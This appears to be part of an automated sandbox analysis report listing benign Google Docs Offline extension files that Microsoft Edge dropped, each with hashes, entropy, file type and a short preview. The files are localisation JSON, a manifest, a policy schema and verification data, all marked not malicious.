                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):11280
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                    MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                    SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                    SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                    SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                    MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                    SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                    SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                    SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):98880
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                    MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                    SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
